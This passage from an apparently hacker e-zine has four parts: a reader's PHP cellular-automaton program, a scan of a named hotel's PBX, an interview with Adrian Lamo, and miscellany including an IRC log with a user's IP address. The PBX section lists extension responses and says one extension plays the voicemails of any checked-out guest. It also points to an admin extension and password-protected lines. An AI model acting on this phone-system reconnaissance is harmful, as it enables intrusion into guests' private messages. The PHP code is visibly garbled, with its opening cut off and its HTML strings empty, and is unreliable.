their authors will be recognized. Solutions may be submitted by: - Forum (http://gonullyourself.org/board/) - IRC (irc.distrust.us #gny) - Email (zine@gonullyourself.org) Excellent resources for further information on adders and logic gates: http://en.wikipedia.org/wiki/Adder_%28electronics%29 http://en.wikipedia.org/wiki/Logic_gate http://www.play-hookey.com/digital/adder.html -------------------------------------------------------------------------------- Last issue, I challenged readers to write a program that would generate elementary cellular automata and display the resulting figures in a dynamic and interesting fashion. One submission was received from ardnew, who wrote a program in php that generates a cellular automaton by controlling the background color of cells in HTML tables. -=-=- > $l) & 1); } return $s; } function bitvec2str($s) { return join('', array_reverse($s)); } function build_rules($l, $n) { global $rule_table; $v = int2bitvec($l, $n); for($i = 0; $i < $l; ++$i) { $t = int2bitvec(log($l, 2), $i); $rule_table[bitvec2str($t)] = $v[$i]; } } function line_length($i) { return 2 * $i + 1; } echo ''; echo 'Linear Cellular Automata'; echo ''; echo '
'; echo 'Enter a rule (0-255): '; echo ''; echo ''; echo '


'; if(isset($_GET['n'])) { echo ''; $n = $_GET['n']; build_rules($NUM_RULES, $n); $prev_line = ''; $curr_line = '1'; $pad_print = ''; $line_print = ''; $pad = ""; for($i = 0; $i < $NUM_LINES; ++$i) { echo ''; $prev_line = $curr_line; $curr_line = ''; $pad = str_repeat(0, ((line_length($NUM_LINES) + 2) - line_length($i)) / 2); $pad_print = preg_replace('/0/', '', $pad); if(preg_match('/1/', $prev_line)) { $line_print = preg_replace('/1/', '', $prev_line); } if(preg_match('/0/', $prev_line)) { $line_print = preg_replace('/0/', '', $line_print); } echo($pad_print . $line_print . $pad_print); for($c = 0, $j = (line_length($NUM_LINES) - line_length($i)) / 2 - 1; $c < line_length($i + 1); ++$c, ++$j) { $curr_line .= $rule_table[substr($pad . $prev_line . $pad, $j, 3)]; } echo ''; } echo '
'; } echo ''; echo ''; ?> [==================================================================================================] -=[ 0x0c Exploring Hotel Pennsylvania's PBX -=[ Author: Shadytel, Inc -=[ Website: http://www.shadytel.com/ What better time to have fun with Hotel Penn's phone system than at the Hackers on Planet Earth conference? We found that the PBX was very buggy and inconsistent, leading to some weird findings. For instance, some extensions are able to be dialed directly from within the hotel (at a courtesy phone), while others are unreachable from the IVR prompt but become reachable if dialed by the operator. Also, some extensions are only reachable via IVR prompt. Sometimes, preceding an extension with 9 will drop you to that extension's voicemail, and pressing # during a VMB greeting sends you to the IVR. The PBX will drop you back to the IVR prompt if it encounters any unhandled exceptions. Extension 555 is the name directory; 654 may be used to listen to voicemails of any checked out guest; and 632 ("Sandy Simmons") is the admin extension, but we weren't able to access it. 100 - VMB - "Express Checkout" 101 - VMB - "Express Checkout" 102 - VMB - "Express Checkout" 103 - VMB - "Express Checkout" 104 - VMB - "Express Checkout" 105 - VMB - "Express Checkout" 106 - VMB - "Express Checkout" 107 - VMB - "Express Checkout" 108 - VMB - "Express Checkout" 109 - VMB - "Express Checkout" 120 - ring out 190 - ring out 198 - ring out 199 - ring out 8600 - HELO - "Sky Top Ballroom" 8601 - VMB 8602 - HELO 8603 - VMB - "18th floor" (the extension dialed from) 8604 - VMB 8605 - VMB 8606 - VMB 8607 - reorder 8608 - VMB 8609 - VMB 8610 - reorder 8611 - VMB 8612 - VMB 8613 - HELO - "Domino's Pizza" (lol) 8614 - VMB 8615 - VMB 8616 - reorder 8617 - VMB 8618 - VMB 8619 - VMB 8620 - VMB 8621 - VMB - "Gary Smith" 8622 - VMB - "Tina" 8623 - VMB - "Sam ???" 8624 - reorder 8625 - reorder 8626 - VMB 8627 - reorder 8628 - reorder 8629 - reorder 8630 - reorder 8631 - ring out 8632 - ring out 8633 - VMB 8634 - VMB 8635 - ring out 8636 - reorder 8637 - reorder 8638 - VMB 8639 - reorder 8640 - VMB 8641 - VMB 8642 - VMB 8643 - VMB 8644 - reorder 8645 - VMB 8646 - VMB 8647 - VMB 8648 - ring out 8649 - reorder 8650 - IVR 8651 - reorder 8652 - VMB 8653 - reorder 8654 - "Security" (not sure if HELO or VMB, hung up quickly) 8655 - reorder 8656 - VMB 8657 - ring out 8658 - ring out 8659 - ring out 8660 - VMB - "Joanna Kyen" 8661 - VMB - "Penn Plaza Pavillion" 8662 - VMB 8663 - VMB 8664 - HELO 8665 - HELO 8666 - HELO - "4th floor" 8667 - HELO - "?th floor" 8668 - HELO - "Seven" 8669 - HELO - "This is seven" 8670 - HELO 8671 - ring out 8672 - ring out 8673 - HELO 8674 - HELO 8675 - HELO 8676 - IVR 8677 - reorder 8678 - ring out 8679 - HELO 8680 - reorder 8681 - reorder 8682 - reorder 8683 - ring out 8684 - reorder 8685 - VMB 8686 - VMB 8687 - VMB 8688 - ring out 8689 - IVR 8690 - reorder 8691 - reorder 8692 - reorder 8693 - VMB 8694 - VMB - "medical manager Matt Rowes" 8695 - VMB - "Diana Carpenter" 8696 - reorder 8697 - reorder 8698 - reorder 8699 - reorder 8800 - ring out 8801 - ring out 8802 - reorder 8803 - VMB 8804 - VMB 8805 - reorder 8806 - reorder 8807 - ring out 8808 - IVR 8809 - reorder 8810 - IVR 8811 - HELO - "I don't want any!" *hangup* 8812 - reorder 8813 - IVR 8814 - reorder 8815 - operator 8816 - IVR 8817 - reorder 8818 - busy (the extension dialed from) 8819 - IVR 8820 - reorder 8821 - reorder 8822 - operator 8823 - reorder 8824 - HELO - "Sup girl, sup? Uhhhhhhhhhhhhhhhhhh.........................." 8825 - IVR 8826 - VMB 8827 - reorder 8828 - reorder 8829 - IVR 8830 - IVR 8831 - reorder 8832 - ring out 8833 - ring out 8834 - reorder 8835 - IVR 8836 - reorder 8837 - ring out 8838 - reorder 8839 - reorder 8840 - reorder 8841 - reorder 8842 - IVR 8843 - IVR 8844 - ring out 8845 - IVR 8846 - IVR 8847 - IVR 8848 - reorder 8849 - reorder 8850 - IVR 8851 - IVR 8852 - IVR 8853 - IVR 8854 - IVR 8855 - IVR 8856 - IVR 8857 - IVR 8858 - VMB 8859 - IVR 8860 - IVR 8861 - IVR 8862 - IVR 8863 - IVR 8864 - beep beep beep 8865 - IVR 8866 - IVR 8867 - reorder 8868 - reorder 8869 - IVR 8870 - IVR 8871 - IVR 8872 - IVR 8873 - reorder 8874 - IVR 8875 - IVR 8876 - IVR 8877 - IVR 8878 - IVR 8879 - IVR 8880 - reorder 8881 - VMB 8882 - reorder 8883 - IVR 8884 - VMB 8885 - reorder 8886 - VMB 8887 - reorder 8888 - operator 8889 - reorder 8890 - Hotel Expert, asks for password 8891 - Hotel Expert, asks for password 8892 - Hotel Expert, asks for password 8893 - reorder 8894 - Hotel Expert, asks for password 8895 - reorder 8896 - reorder 8897 - reorder 8898 - VMB 8899 - VMB [==================================================================================================] -=[ 0x0c Interview with Adrian Lamo With all of the recent news about Wikileaks, who hasn't heard of Adrian Lamo? But this isn't the first time he's made national headlines. We set out to learn more about Adrian himself, his past as a high-profile hacker, and his thoughts on current debates in the scene today. Before we began, Adrian wanted to express: I'd like to point you to three hyperlinks that you can read at your leisure - perhaps while I type answers - they're brief. They're essential to understanding me, in a way. One is about why I answer in hyperlinks so often. Someone I respect wrote it. It's: http://lucidstranger.blogspot.com/2007/02/poem-experience.html The 2nd is about not rushing to put me on a pedestal or demonize me too quickly. I'm human, like everyone else. http://users.resist.ca/~adrian/kokoro.htm The last is about interpreting my words. It's: http://adrian.adrian.org/zot.htm What is your opinion on the disclosure of vulnerabilities and proof-of-concept exploits? Do you believe in full disclosure, and should security researchers notify affected vendors prior to their announcements? I believe in a general principal of courtesy, and ensuring that announcements/disclosures don't adversely affect users by way of unpatched vulnerabilities. However, vendors with a history of working poorly with the security community or engaging in poor corporate citizenship should periodically be made examples of. After all, if you can't be a good example, you can always be a terrible warning. I'm generally in favor of full disclosure, with the repeated caveat that we should be gentlemen about it. That being said, full disclosure and proofs-of-concept when no patch exists isn't/aren't always inappropriate. The security community - on all levels - does not exist to guarantee safety for all. Sometimes it's healthy for entities to learn that they're vulnerable via a phone call from the press. Part of the mission of the security community is inherently to irritate, and in so doing, force the creation of pearls; to produce corporate, technological, and societal evolution. It is not here to make failure painless and lesson-free. If you have watched Hackers Wanted, my closing monologue is something of an example of what I'm talking about here. Many news stories talk about the curiosity you possess in everything, not just computers. What is the most interesting thing you have ever found and/or accessed in your urban explorations? The most famous one is, of course, the kitten that's covered in Kevin Mitnick's book. But my favorite memory is an abandoned power plant along the banks of the James River in Richmond, VA. It was very steampunk, with labyrinthine tunnels and floors that gave way to deep underlevels. I explored it for days on end, taking pictures. Sometimes you'd turn corners and be confronted with a ghostly figure, only to realize it was an amazingly detailed mural barely illuminated in the twilight. Dominion Power, I miss you. Of course, they're all unique in their own way, and they're all fading, one by one, sometimes literally, as the song goes, paved ... and put up a parking lot. The InformationWeek cover story on me had its photos shot in one of my abandoned buildings literally as crews were tearing it down. Google Earth shows a parking structure there today. The Western Union Telegraph (yes, just telegraph, no money orders when it was built) building in Philly is gone, more gentrification. Thanks gentrification, we needed that Starbucks. My most surreal one was in the roof of the cathedral at the Cathedral of Learning in Pittsburgh. The trash and debris got older and older as you made your way through. I popped out the other end through a ventilation shaft ... in the (empty, at that hour) network room. Like I said, all unique, all dwindling, never to be repeated. What motivated you to become a hacker? Was there anyone in your life who served as an inspiration? Nothing motivated me. I always was. It's something you're born into, not something you can ape with any number of classes or certifications. You have to love learning. I never had any heroes or inspirations. It's still surreal to me when ex-LoD/H people contact me - I grew up reading old Legion of Doom Technical Journals on BBS systems - but they're just people, like me. The only person who really stirred my love of technology - apart from my dad - was my 9th grade computer science teacher, Douglas Keachie. We were nominally enemies at the time, but the adversity inspired me to learn. We remember each other much more fondly 15 years later. ;> Have you ever dabbled in other disciplines of technology, such as phone phreaking or hardware hacking? The short answer is yes. I'd refer you to paragraph 2 of: http://www.sfweekly.com/2003-04-16/news/a-duty-to-hack/2/ - some of the things that run our country are very vulnerable. The FBI intervened before I was able to make a disclosure. I don't know if I ever will. I do know that sources tell me not much has changed. Do you regularly attend any hacking conferences other than HOPE? Which conference (and year) has been your favorite, and why? I attend Defcon, and I've enjoyed Summercon. Defcon V, my first Defcon, was undoubtedly also my favorite one in the Defcon series. It was on the cusp before Defcon turned more corporate, and it was my first real hacking conference. It had everything - getting mistaken for a fugitive, being stranded in Vegas, meeting new people, and simply being anonymous - meeting people with no preconception of what type of person I am. In terms of HOPE, I enjoyed this year the most. It was epic-level fun. I enjoyed every minute of it. Many more people were quietly friendly than were vocally intrusive. I don't think the latter realized how much of a kick I got out of them. I will say, it was funny to see the reactions of anti-Adrian people at the panel. I don't really consider them anti-Adrian. To be anti-Adrian, they'd have to know Adrian. They know my persona, my public preconceptions, my idoru. None of these things are me. Because of this, there's a certain disconnect when they speak out - to me, they're talking about someone else. How has being diagnosed with Asperger's Syndrome affected your life? Do you believe it plays a role in your hacker mindset? I honestly don't know yet. It's too soon for me to say how it's affected my life, if at all. I feel I understand myself better. But I still think the word is a label for something we don't fully understand. Do you believe that formal education plays a positive or negative role in the learning experience of hackers, and why? I think formal education plays a positive role in the learning experience, but not in the way that's strictly intended. Nobody ever learned to be a great writer in English class. Instead, it prepares differently oriented minds for adversity, and for taking unintended lessons from human events - something that's very hackerish, in my opinion, learning to sink or swim at the art of gleaning value from a wasteland of ineffective techniques and irrelevant data. The media has frequently referred to you as the "homeless hacker" for sleeping in abandoned buildings and traveling the country via bus. Are you still upholding this lifestyle, and do you recommend it to others? I don't recommend anything to others, beyond making their own choices and enriching the total of human events by seeking out new situations, circumstances, and experiences. I still travel by bus and rail, but couch surf more than I crash in random places. I haven't stopped, but I don't have time for it to be a lifestyle anymore. And, more importantly, it's no longer new to me - I want to keep my brain active and engaged with new approaches to life, rather than repeating the old. We've mainly avoided the issue with Wikileaks and Bradley Manning. However, is there anything you wish to say about the situation? Also, before the whole ordeal, if you were to switch places with Manning, would you have leaked the Collateral Murder video and diplomatic cables yourself? Because I'm not Manning, and can't switch places with him, or go back in time, I can't say what I would do in his place. However, based on my previous actions, I would never have released the cables. PFC. Manning has a good heart, but not a good sense of justice, perspective, or loyalty. That said, if he had just leaked the so-called Collateral Murder video, I would not have exposed his actions, because that was a fairly harmless leak, and the harm to him would outweigh any potential harm prevented. Thank you for your time. Is there anything else you would like to add before we conclude? The only thing I'll add is that sometimes in life, you're presented with no good choices, only less-bad ones, and you'll be hated by some sectors no matter what you do. I took the menu of bad choices and elected the one I felt served the needs of the many. No one can know what that's like until they've had to make that call. -=-=- If you would like to weigh in on the interview, the Wikileaks controversy, or anything Adrian-related, our contact information is in the introduction - we will publish intelligent arguments and opinions (both for and against) in the next issue. [==================================================================================================] -=[ 0x0e Et Cetera, Etc. -=[ Author: teh crew With the rant finished from last issue's Et Cetera, Etc., this time we're just going to throw a bunch of whatever in here and see what happens. A bit of personalization, ya know? ;) GNY goes to HOPE! ---------------------------------------------------------------------------------------------------- The Next HOPE was a blast. storm, m0nkee, c1rcuit, and HIT_007 hung out and had a netbook/laptop orgy at the good 'ol Hotel Pennsylvania for the weekend, representing GNY well. Media and various shitz from the conference are posted up at http://gonullyourself.org/hope/. You will see a link to our QR code there - it was an idea we had while at the con. We got ASCII goatse'd by scanning one... it made sense that we make our own. It linked to a simple message board that we created for people to communicate during the con. It went pretty well, and although being put up rather late, still was a success. Moving on, the talks were done well for the most part. The social engineering panel was fun as always, but the biggest and most popular story was of course the Wikileaks vs. Adrian Lamo controversy. Mr. Lamo was in attendance and us HOPE-goers were given a chance to ask him questions. People were mature about that... for the most part. The only real complaint would be that there was definitely room for more technical talks and topics other than privacy, but 2600 has always been pretty political. In any event, for those who have never been to HOPE or a conference in general, it is certainly recommended. GNY road trip to Defcon next year..? :D #telephony shenanigans! ---------------------------------------------------------------------------------------------------- * HACKER (~HACKER@99.56.199.228) has joined #telephony BEAVE I WANT MY ACCESS TO TELEPHREAK TELEPRHEAK IS FULL OF NEW PEOPLE I HAVE YOU DEFCON BEAVE KICKED ME OUT LADYNIKON THEY DON'T KNOW IM A HACKER MODE DEFCON IS LOCATED IN LOS ANGELES ? HONESTLY TELEPHREAK I AM A HACKER/PHREAKER/CRACKER YOU KNOW IT DOES NOT MATTER IF I LEAVE MY TRACE ON THE LOGINS SOON IT WILL MATTER DEFCON NEEDS TO SEE LOS ANGELES TALKEE BEAVE IS A PHREAKER? A HACKER TYPE? BEAVE KNOWS MY IP BEAVE CONTACT ME THROUGH SSH COME HERE BEAVE BEAVE IS NO HACKER REMEMBER THAT BEAVE AND LADYNIKON ARE JUST NEW LADY NIKON IS NO HACKER BEAVE IS NO HACKER * HACKER (~HACKER@99.56.199.228) Quit (Quit: Leaving) (By the way, does anyone know who this fellow is? He also goes by the name looptroop and has been regularly talking to himself in #telephony and #phreak on 2600net about nonsensical conspiracy theories for almost a year now. Dude has some persistence. @_@) Better than disk encryption! ---------------------------------------------------------------------------------------------------- open up the case OUT OF NOWHERE FUCKING DEADLY SPIDERS and a snapper turtle just for fun did you recover the harddrive .... no sir it was guarded by a 175 lb snapping turtle lets let this one go his name was alph and while his name sounded whimsical and friendly I disagreed with his views on politics Wait, what? ---------------------------------------------------------------------------------------------------- Date: Sat, 11 Sep 2010 07:01:30 +0530 Subject: Banner Exchange From: Indian Cyber Army To: hixmostorm@hotmail.com Hi,i m the owner of Indian Cyber Army (ICA) @ http://cyberarmy.in I see ur site . Its really nice,We are now allowing and inviting webmasters to do Banner Exchange. That will make Profit for both both of us. Indian cyber army is totaly a Cyber security Community. Hope you know already about it.So,I need members of cyber feild,and u need traffic and backlink. Waiting for you positive reply... Owner,ICA. -=-=- Date: Sat, 11 Sep 2010 22:11:08 -0400 Subject: RE: Banner Exchange From: storm gny To: Hi ICA, Thank you for considering us for a link exchange. I've passed on your request to the members of the GNY review board, and we'll get back to you within the week. It usually takes only a few days, but we're busy arranging the funeral for m0nkee since he got hit by a bus on Thursday. Wrong place, wrong time I guess. Anyways, talk to you soon. Regards, John Travolta -=-=- Date: Sun, 12 Sep 2010 08:25:29 +0530 Subject: Re: Banner Exchange From: Indian Cyber Army To: storm gny OKay,me also will add a new page on my site for banner exchage,there ur logo will be added,after i getting ur response that u add my banner on ur site. Thankyou. Admin,ICA. ...>_> Anyways, it looks like you've reached the end of GNY Zine, Issue #2. The next issue is already in progress, so (if everything goes according to plan), we'll see you again in January. Our contact information is in the introduction, and we'll try our best to respond to your messages within a reasonable time. If you have content for future issues, send it in! As always, may your hax be plentiful and full of fish. Oh, and red boxing isn't dead. <3, the gny crew [==================================================================================================]